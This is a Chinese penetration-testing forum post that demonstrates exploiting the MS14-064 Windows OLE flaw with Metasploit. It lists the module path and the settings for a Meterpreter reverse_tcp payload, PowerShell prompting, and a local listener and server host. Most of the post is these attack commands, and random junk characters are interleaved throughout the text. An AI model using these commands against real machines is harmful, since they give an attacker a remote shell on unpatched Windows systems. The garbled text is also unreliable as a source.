5 s' A8 {, k `# W4 M 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
4 q: M4 F' b1 b( M$ a
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
, _" R0 V+ m8 p K" f% ]
4 c9 k |# t8 a) j# y 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp* c; r5 I8 G( h+ ^
( J9 F& |3 f8 E+ H$ R3 R/ N. n% S9 ]- {5 `5 U; ?' [ set AllowPowershellPrompt true
, a+ e% q; X7 l2 E' I! u4 MSet LHOST 192.168.0.109
& U5 H5 d6 A( t+ k! R, S( l3 a/ Iset SRVHOST 192.168.0.109
Set uripath share* G) Y6 V3 I: v/ }& O8 W
Set srvport 80; z1 Z8 }6 e, v5 j. y
1 t9 V, Y1 \4 C% k; Z, ^. e
# o5 o9 s' Q5 A( l
& m/ y5 @* V% F o2 x! p
) i: r. R# \2 n7 E# O下面我们来访问本地地址如图:6 a$ e+ h+ [4 ?+ ]: t7 ^
: Y% y4 n* e) {6 U' N) n. }
2 W2 ~) a9 v* u1 Z' B- J7 X4 v0 g& K x- ~ ! b1 `0 W% y1 J$ g: z
v3 J+ Y/ J- n. a( K5 F8 j8 o
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |